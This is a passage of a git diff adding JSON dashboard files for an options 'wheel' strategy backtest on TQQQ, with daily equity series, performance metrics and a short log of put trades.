524.7598876953125 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3672485351562 + ], + [ + "2025-06-09", + 528.1436157226562 + ], + [ + "2025-06-10", + 531.6366577148438 + ], + [ + "2025-06-11", + 529.8452758789062 + ], + [ + "2025-06-12", + 531.0892944335938 + ], + [ + "2025-06-13", + 524.4215698242188 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.783203125 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3952026367188 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.1524047851562 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283325195312 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7242431640625 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747192382812 + ], + [ + "2025-07-28", + 566.0382690429688 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309936523438 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.193115234375 + ], + [ + "2025-08-14", + 577.7447509765625 + ], + [ + "2025-08-15", + 575.2042236328125 + ], + [ + "2025-08-18", + 574.9750366210938 + ], + [ + "2025-08-19", + 567.1740112304688 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.210205078125 + ], + [ + "2025-08-26", + 570.4915771484375 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.527587890625 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624267578125 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.9192504882812 + ], + [ + "2025-09-12", + 584.4896850585938 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.992919921875 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.8842163085938 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4784545898438 + ], + [ + "2025-10-15", + 600.6876831054688 + ], + [ + "2025-10-16", + 598.46337890625 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.9839477539062 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4694213867188 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.67431640625 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.7926635742188 + ], + [ + "2025-11-19", + 598.3436279296875 + ], + [ + "2025-11-20", + 584.1797485351562 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3407592773438 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.67431640625 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4172973632812 + ], + [ + "2025-12-03", + 621.9334716796875 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915283203125 + ], + [ + "2025-12-09", + 623.4595336914062 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0586547851562 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601196289062 + ], + [ + "2025-12-19", + 615.47998046875 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ], + "metrics": { + "total_return": 5.328146325585448, + "final_value": 10532.814632558544, + "cagr": 5.34692422213614, + "sharpe": 0.5849740422340445, + "max_dd": -2.5196350839124597, + "n_trades": 9, + "wins": 7, + "losses": 2, + "win_rate": 77.77777777777779, + "avg_win": 84.73485015577744, + "avg_loss": -181.8129352527916, + "chain_quotes": 0, + "bs_quotes": 69 + }, + "trade_log": [ + { + "date": "2025-09-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.74, + "spot": 44.36949920654297, + "premium": 0.5536159877961406, + "close_cost": 0.03495383585154532, + "pnl": 45.886215194459524, + "hold_days": 14, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 44.03, + "spot": 53.771759033203125, + "premium": 0.7966187749534139, + "close_cost": 0.05749347645129843, + "pnl": 67.93252985021155, + "hold_days": 10, + "result": "Win" + }, + { + "date": "2025-11-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.48, + "spot": 51.84297180175781, + "premium": 1.778766330702327, + "close_cost": 0.1473346610213957, + "pnl": 157.16316696809312, + "hold_days": 19, + "result": "Win" + }, + { + "date": "2025-12-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.91, + "spot": 54.83333969116211, + "premium": 1.0365927316800434, + "close_cost": 0.06827979046142785, + "pnl": 90.85129412186156, + "hold_days": 11, + "result": "Win" + }, + { + "date": "2026-01-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.56, + "spot": 55.6679573059082, + "premium": 0.5702405787526459, + "close_cost": 0.10914421850859846, + "pnl": 40.129636024404746, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2026-02-05 00:00:00", + "type": "PUT", + "action": "SL_Close", + "strike": 47.71, + "spot": 47.561363220214844, + "premium": 0.7215057151762458, + "close_cost": 2.419175603087396, + "pnl": -175.746988791115, + "hold_days": 2, + "result": "Loss" + }, + { + "date": "2026-03-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.23, + "spot": 49.26853942871094, + "premium": 1.0610637306577004, + "close_cost": 0.17795843012527435, + "pnl": 82.33053005324261, + "hold_days": 15, + "result": "Win" + }, + { + "date": "2026-03-20 00:00:00", + "type": "PUT", + "action": "SL_Close", + "strike": 43.75, + "spot": 43.00889205932617, + "premium": 0.8460148560320597, + "close_cost": 2.6650036731767415, + "pnl": -187.87888171446818, + "hold_days": 3, + "result": "Loss" + }, + { + "date": "2026-04-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.18, + "spot": 50.65999984741211, + "premium": 1.4108038692109268, + "close_cost": 0.26249808042923695, + "pnl": 108.85057887816899, + "hold_days": 6, + "result": "Win" + } + ], + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "style": "neutral" + }, + "start": "2025-04-24", + "end": "2026-04-24", + "_updated_at": "2026-04-24 18:49:43" +} \ No newline at end of file diff --git a/data/dashboard/wheel/wheel_aggressive_latest.json b/data/dashboard/wheel/wheel_aggressive_latest.json new file mode 100644 index 0000000..7747a54 --- /dev/null +++ b/data/dashboard/wheel/wheel_aggressive_latest.json @@ -0,0 +1,32790 @@ +{ + "style": "aggressive", + "result_payload": { + "equity": [ + [ + "2021-04-01", + 9998.183037138344 + ], + [ + "2021-04-05", + 10011.819477826999 + ], + [ + "2021-04-06", + 10012.993901433989 + ], + [ + "2021-04-07", + 10014.168462805228 + ], + [ + "2021-04-08", + 10015.343161956878 + ], + [ + "2021-04-09", + 10016.517998905103 + ], + [ + "2021-04-12", + 10017.692973666064 + ], + [ + "2021-04-13", + 10018.868086255929 + ], + [ + "2021-04-14", + 10020.043336690864 + ], + [ + "2021-04-15", + 10021.21872498704 + ], + [ + "2021-04-16", + 10022.39425116063 + ], + [ + "2021-04-19", + 10023.569915227803 + ], + [ + "2021-04-20", + 10024.745717204738 + ], + [ + "2021-04-21", + 10025.921657107612 + ], + [ + "2021-04-22", + 10027.097734952604 + ], + [ + "2021-04-23", + 10028.273950755894 + ], + [ + "2021-04-26", + 10029.450304533668 + ], + [ + "2021-04-27", + 10030.626796302107 + ], + [ + "2021-04-28", + 10031.8034260774 + ], + [ + "2021-04-29", + 10032.980193875735 + ], + [ + "2021-04-30", + 10034.157099713304 + ], + [ + "2021-05-03", + 10035.334143606298 + ], + [ + "2021-05-04", + 10033.521325570913 + ], + [ + "2021-05-05", + 10032.58459180628 + ], + [ + "2021-05-06", + 10042.429649753263 + ], + [ + "2021-05-07", + 10043.6076640471 + ], + [ + "2021-05-10", + 10044.78581652639 + ], + [ + "2021-05-11", + 10042.97410720734 + ], + [ + "2021-05-12", + 9978.01902449439 + ], + [ + "2021-05-13", + 10010.756383210673 + ], + [ + "2021-05-14", + 10053.21624747579 + ], + [ + "2021-05-17", + 10062.62787490469 + ], + [ + "2021-05-18", + 10060.81825852535 + ], + [ + "2021-05-19", + 10069.14959222023 + ], + [ + "2021-05-20", + 10083.860481191461 + ], + [ + "2021-05-21", + 10085.043355475693 + ], + [ + "2021-05-24", + 10086.226368515472 + ], + [ + "2021-05-25", + 10084.419520327074 + ], + [ + "2021-05-26", + 10096.004021190514 + ], + [ + "2021-05-27", + 10096.74748797434 + ], + [ + "2021-05-28", + 10105.062994088155 + ], + [ + "2021-06-01", + 10103.258355505894 + ], + [ + "2021-06-02", + 10115.651050559407 + ], + [ + "2021-06-03", + 10102.085906069462 + ], + [ + "2021-06-04", + 10128.557063040265 + ], + [ + "2021-06-07", + 10129.745180399545 + ], + [ + "2021-06-08", + 10127.943437129403 + ], + [ + "2021-06-09", + 10134.254575356526 + ], + [ + "2021-06-10", + 10151.003649127908 + ], + [ + "2021-06-11", + 10152.194399555097 + ], + [ + "2021-06-14", + 10153.385289661734 + ], + [ + "2021-06-15", + 10154.576319464202 + ], + [ + "2021-06-16", + 10155.76748897889 + ], + [ + "2021-06-17", + 10156.958798222187 + ], + [ + "2021-06-18", + 10158.150247210482 + ], + [ + "2021-06-21", + 10159.341835960167 + ], + [ + "2021-06-22", + 10160.53356448764 + ], + [ + "2021-06-23", + 10161.725432809293 + ], + [ + "2021-06-24", + 10162.917440941528 + ], + [ + "2021-06-25", + 10164.109588900743 + ], + [ + "2021-06-28", + 10165.30187670334 + ], + [ + "2021-06-29", + 10166.494304365726 + ], + [ + "2021-06-30", + 10167.686871904305 + ], + [ + "2021-07-01", + 10168.879579335486 + ], + [ + "2021-07-02", + 10170.072426675677 + ], + [ + "2021-07-06", + 10171.265413941292 + ], + [ + "2021-07-07", + 10172.458541148742 + ], + [ + "2021-07-08", + 10173.651808314446 + ], + [ + "2021-07-09", + 10174.84521545482 + ], + [ + "2021-07-12", + 10176.038762586282 + ], + [ + "2021-07-13", + 10177.232449725258 + ], + [ + "2021-07-14", + 10178.426276888167 + ], + [ + "2021-07-15", + 10179.620244091437 + ], + [ + "2021-07-16", + 10180.814351351493 + ], + [ + "2021-07-19", + 10182.008598684766 + ], + [ + "2021-07-20", + 10183.202986107686 + ], + [ + "2021-07-21", + 10184.397513636686 + ], + [ + "2021-07-22", + 10185.592181288202 + ], + [ + "2021-07-23", + 10186.786989078671 + ], + [ + "2021-07-26", + 10187.981937024531 + ], + [ + "2021-07-27", + 10189.177025142222 + ], + [ + "2021-07-28", + 10190.372253448188 + ], + [ + "2021-07-29", + 10191.567621958873 + ], + [ + "2021-07-30", + 10192.763130690724 + ], + [ + "2021-08-02", + 10193.95877966019 + ], + [ + "2021-08-03", + 10195.15456888372 + ], + [ + "2021-08-04", + 10196.350498377766 + ], + [ + "2021-08-05", + 10197.546568158783 + ], + [ + "2021-08-06", + 10198.742778243228 + ], + [ + "2021-08-09", + 10199.939128647558 + ], + [ + "2021-08-10", + 10201.135619388235 + ], + [ + "2021-08-11", + 10202.332250481719 + ], + [ + "2021-08-12", + 10203.529021944474 + ], + [ + "2021-08-13", + 10204.725933792966 + ], + [ + "2021-08-16", + 10205.922986043663 + ], + [ + "2021-08-17", + 10207.120178713034 + ], + [ + "2021-08-18", + 10208.317511817551 + ], + [ + "2021-08-19", + 10209.51498537369 + ], + [ + "2021-08-20", + 10210.712599397923 + ], + [ + "2021-08-23", + 10211.910353906727 + ], + [ + "2021-08-24", + 10213.108248916586 + ], + [ + "2021-08-25", + 10214.306284443977 + ], + [ + "2021-08-26", + 10215.504460505384 + ], + [ + "2021-08-27", + 10216.702777117294 + ], + [ + "2021-08-30", + 10217.901234296192 + ], + [ + "2021-08-31", + 10219.09983205857 + ], + [ + "2021-09-01", + 10220.298570420915 + ], + [ + "2021-09-02", + 10221.497449399722 + ], + [ + "2021-09-03", + 10222.696469011486 + ], + [ + "2021-09-07", + 10223.895629272703 + ], + [ + "2021-09-08", + 10225.094930199873 + ], + [ + "2021-09-09", + 10226.294371809496 + ], + [ + "2021-09-10", + 10227.493954118074 + ], + [ + "2021-09-13", + 10228.693677142111 + ], + [ + "2021-09-14", + 10229.893540898116 + ], + [ + "2021-09-15", + 10231.093545402595 + ], + [ + "2021-09-16", + 10232.293690672059 + ], + [ + "2021-09-17", + 10233.493976723019 + ], + [ + "2021-09-20", + 10231.704403571992 + ], + [ + "2021-09-21", + 10239.904710500625 + ], + [ + "2021-09-22", + 10244.013255344335 + ], + [ + "2021-09-23", + 10245.214916143756 + ], + [ + "2021-09-24", + 10246.416717902452 + ], + [ + "2021-09-27", + 10244.628660636958 + ], + [ + "2021-09-28", + 10136.060085246532 + ], + [ + "2021-09-29", + 10129.960266041599 + ], + [ + "2021-09-30", + 10112.205136441953 + ], + [ + "2021-10-01", + 10159.319119939715 + ], + [ + "2021-10-04", + 9996.861321296114 + ], + [ + "2021-10-05", + 10052.39003895834 + ], + [ + "2021-10-06", + 10078.326996200365 + ], + [ + "2021-10-07", + 10101.527329561302 + ], + [ + "2021-10-08", + 10101.474416635507 + ], + [ + "2021-10-11", + 10116.888494226587 + ], + [ + "2021-10-12", + 10116.700696290822 + ], + [ + "2021-10-13", + 10133.275306293574 + ], + [ + "2021-10-14", + 10134.46397712031 + ], + [ + "2021-10-15", + 10135.652787382547 + ], + [ + "2021-10-18", + 10133.851737096644 + ], + [ + "2021-10-19", + 10152.834819692236 + ], + [ + "2021-10-20", + 10155.341929608929 + ], + [ + "2021-10-21", + 10156.53318893253 + ], + [ + "2021-10-22", + 10157.724587995275 + ], + [ + "2021-10-25", + 10155.926126813554 + ], + [ + "2021-10-26", + 10179.399958633527 + ], + [ + "2021-10-27", + 10180.59404005328 + ], + [ + "2021-10-28", + 10181.788261543219 + ], + [ + "2021-10-29", + 10182.982623119775 + ], + [ + "2021-11-01", + 10184.177124799378 + ], + [ + "2021-11-02", + 10185.371766598466 + ], + [ + "2021-11-03", + 10186.566548533472 + ], + [ + "2021-11-04", + 10187.761470620837 + ], + [ + "2021-11-05", + 10188.956532877 + ], + [ + "2021-11-08", + 10190.151735318404 + ], + [ + "2021-11-09", + 10191.347077961495 + ], + [ + "2021-11-10", + 10189.552560822716 + ], + [ + "2021-11-11", + 10197.691915429159 + ], + [ + "2021-11-12", + 10198.888142563379 + ], + [ + "2021-11-15", + 10200.084510019484 + ], + [ + "2021-11-16", + 10201.281017813933 + ], + [ + "2021-11-17", + 10202.477665963192 + ], + [ + "2021-11-18", + 10203.674454483722 + ], + [ + "2021-11-19", + 10204.87138339199 + ], + [ + "2021-11-22", + 10203.078452704465 + ], + [ + "2021-11-23", + 10198.775696934437 + ], + [ + "2021-11-24", + 10209.123534768269 + ], + [ + "2021-11-26", + 10157.810357970806 + ], + [ + "2021-11-29", + 10215.89003727771 + ], + [ + "2021-11-30", + 10169.604205486567 + ], + [ + "2021-12-01", + 10067.172619701842 + ], + [ + "2021-12-02", + 10124.218644963114 + ], + [ + "2021-12-03", + 9991.857515326885 + ], + [ + "2021-12-06", + 10083.107766360348 + ], + [ + "2021-12-07", + 10198.376380544469 + ], + [ + "2021-12-08", + 10219.031896994495 + ], + [ + "2021-12-09", + 10191.738762345036 + ], + [ + "2021-12-10", + 10229.843554330613 + ], + [ + "2021-12-13", + 10248.945411789224 + ], + [ + "2021-12-14", + 10224.275181145731 + ], + [ + "2021-12-15", + 10283.696258877637 + ], + [ + "2021-12-16", + 10284.902574640748 + ], + [ + "2021-12-17", + 10286.109031909178 + ], + [ + "2021-12-20", + 10284.325630699528 + ], + [ + "2021-12-21", + 10329.738718217199 + ], + [ + "2021-12-22", + 10330.950434931785 + ], + [ + "2021-12-23", + 10332.162293785243 + ], + [ + "2021-12-27", + 10330.384294794245 + ], + [ + "2021-12-28", + 10336.108176533808 + ], + [ + "2021-12-29", + 10352.344745964252 + ], + [ + "2021-12-30", + 10361.213308123726 + ], + [ + "2021-12-31", + 10352.921905150075 + ], + [ + "2022-01-03", + 10427.164919939038 + ], + [ + "2022-01-04", + 10384.76130787654 + ], + [ + "2022-01-05", + 10188.385577150884 + ], + [ + "2022-01-06", + 10192.21525524655 + ], + [ + "2022-01-07", + 10099.754951004532 + ], + [ + "2022-01-10", + 10116.721418816936 + ], + [ + "2022-01-11", + 10198.401112157871 + ], + [ + "2022-01-12", + 10227.297504358849 + ], + [ + "2022-01-13", + 10109.976674061603 + ], + [ + "2022-01-14", + 10164.44002817576 + ], + [ + "2022-01-18", + 9964.921706243154 + ], + [ + "2022-01-19", + 9906.051280429507 + ], + [ + "2022-01-20", + 9822.045514948522 + ], + [ + "2022-01-21", + 9642.230100410745 + ], + [ + "2022-01-24", + 9692.652881274758 + ], + [ + "2022-01-25", + 9555.048256668688 + ], + [ + "2022-01-26", + 9560.203087305012 + ], + [ + "2022-01-27", + 9520.40305947109 + ], + [ + "2022-01-28", + 9633.229676174442 + ], + [ + "2022-01-31", + 9688.532741323665 + ], + [ + "2022-02-01", + 9686.866339360213 + ], + [ + "2022-02-02", + 9716.093258913883 + ], + [ + "2022-02-03", + 9571.874747491232 + ], + [ + "2022-02-04", + 9637.580269518965 + ], + [ + "2022-02-07", + 9659.439086619392 + ], + [ + "2022-02-08", + 9769.986383071571 + ], + [ + "2022-02-09", + 9817.268174167111 + ], + [ + "2022-02-10", + 9818.41977618365 + ], + [ + "2022-02-11", + 9819.571513287381 + ], + [ + "2022-02-14", + 9820.723385494153 + ], + [ + "2022-02-15", + 9818.885392819813 + ], + [ + "2022-02-16", + 9832.038955847767 + ], + [ + "2022-02-17", + 9736.831504536643 + ], + [ + "2022-02-18", + 9702.817109666184 + ], + [ + "2022-02-22", + 9680.113951999314 + ], + [ + "2022-02-23", + 9579.77425040255 + ], + [ + "2022-02-24", + 9712.557305949409 + ], + [ + "2022-02-25", + 9774.057655515568 + ], + [ + "2022-02-28", + 9840.106061908262 + ], + [ + "2022-03-01", + 9852.088786200602 + ], + [ + "2022-03-02", + 9914.082729089501 + ], + [ + "2022-03-03", + 9879.408748820497 + ], + [ + "2022-03-04", + 9839.67921394574 + ], + [ + "2022-03-07", + 9624.34050084391 + ], + [ + "2022-03-08", + 9619.115850788949 + ], + [ + "2022-03-09", + 9712.020055280693 + ], + [ + "2022-03-10", + 9704.655848387263 + ], + [ + "2022-03-11", + 9656.619312050805 + ], + [ + "2022-03-14", + 9591.939866859253 + ], + [ + "2022-03-15", + 9665.254165919572 + ], + [ + "2022-03-16", + 9714.191830781516 + ], + [ + "2022-03-17", + 9725.651164579845 + ], + [ + "2022-03-18", + 9732.92476695945 + ], + [ + "2022-03-21", + 9731.988145985255 + ], + [ + "2022-03-22", + 9781.526582230825 + ], + [ + "2022-03-23", + 9770.564964619942 + ], + [ + "2022-03-24", + 9812.689784648868 + ], + [ + "2022-03-25", + 9813.840849603313 + ], + [ + "2022-03-28", + 9812.002049581952 + ], + [ + "2022-03-29", + 9863.5401112411 + ], + [ + "2022-03-30", + 9855.502470204601 + ], + [ + "2022-03-31", + 9835.012575265833 + ], + [ + "2022-04-01", + 9850.339153675777 + ], + [ + "2022-04-04", + 9915.530909491821 + ], + [ + "2022-04-05", + 9844.378958376343 + ], + [ + "2022-04-06", + 9752.570000689348 + ], + [ + "2022-04-07", + 9778.171467128363 + ], + [ + "2022-04-08", + 9706.61252874035 + ], + [ + "2022-04-11", + 9541.858376524859 + ], + [ + "2022-04-12", + 9542.772576739188 + ], + [ + "2022-04-13", + 9628.4113771164 + ], + [ + "2022-04-14", + 9552.555332869833 + ], + [ + "2022-04-18", + 9600.453365938765 + ], + [ + "2022-04-19", + 9667.608831444928 + ], + [ + "2022-04-20", + 9636.045422182699 + ], + [ + "2022-04-21", + 9563.18542507262 + ], + [ + "2022-04-22", + 9416.69638219768 + ], + [ + "2022-04-25", + 9475.572875921855 + ], + [ + "2022-04-26", + 9326.35030461222 + ], + [ + "2022-04-27", + 9334.452134133082 + ], + [ + "2022-04-28", + 9406.55712014093 + ], + [ + "2022-04-29", + 9290.019514686233 + ], + [ + "2022-05-02", + 9383.643805843549 + ], + [ + "2022-05-03", + 9413.781270411668 + ], + [ + "2022-05-04", + 9488.069846452303 + ], + [ + "2022-05-05", + 9346.454236459247 + ], + [ + "2022-05-06", + 9312.646155926577 + ], + [ + "2022-05-09", + 9137.98841942738 + ], + [ + "2022-05-10", + 9170.593489083054 + ], + [ + "2022-05-11", + 9106.032565456957 + ], + [ + "2022-05-12", + 9110.355907411673 + ], + [ + "2022-05-13", + 9201.636794483406 + ], + [ + "2022-05-16", + 9241.971855229081 + ], + [ + "2022-05-17", + 9297.930068364056 + ], + [ + "2022-05-18", + 9184.548672563938 + ], + [ + "2022-05-19", + 9175.043670627798 + ], + [ + "2022-05-20", + 9170.192205630878 + ], + [ + "2022-05-23", + 9227.366191615027 + ], + [ + "2022-05-24", + 9200.536276184672 + ], + [ + "2022-05-25", + 9241.027896458423 + ], + [ + "2022-05-26", + 9291.919773974667 + ], + [ + "2022-05-27", + 9297.940153376081 + ], + [ + "2022-05-31", + 9336.192906899854 + ], + [ + "2022-06-01", + 9338.554940522772 + ], + [ + "2022-06-02", + 9376.972999177611 + ], + [ + "2022-06-03", + 9375.082952934941 + ], + [ + "2022-06-06", + 9406.776110828396 + ], + [ + "2022-06-07", + 9426.337467366371 + ], + [ + "2022-06-08", + 9427.44321175915 + ], + [ + "2022-06-09", + 9428.549085859851 + ], + [ + "2022-06-10", + 9426.665089683693 + ], + [ + "2022-06-13", + 9357.515451376847 + ], + [ + "2022-06-14", + 9370.677644271143 + ], + [ + "2022-06-15", + 9432.053593628832 + ], + [ + "2022-06-16", + 9327.813123155784 + ], + [ + "2022-06-17", + 9365.010354322474 + ], + [ + "2022-06-21", + 9425.65163372349 + ], + [ + "2022-06-22", + 9435.018690011177 + ], + [ + "2022-06-23", + 9454.453462823722 + ], + [ + "2022-06-24", + 9455.96376688517 + ], + [ + "2022-06-27", + 9470.815179226303 + ], + [ + "2022-06-28", + 9422.105017113727 + ], + [ + "2022-06-29", + 9433.971818785994 + ], + 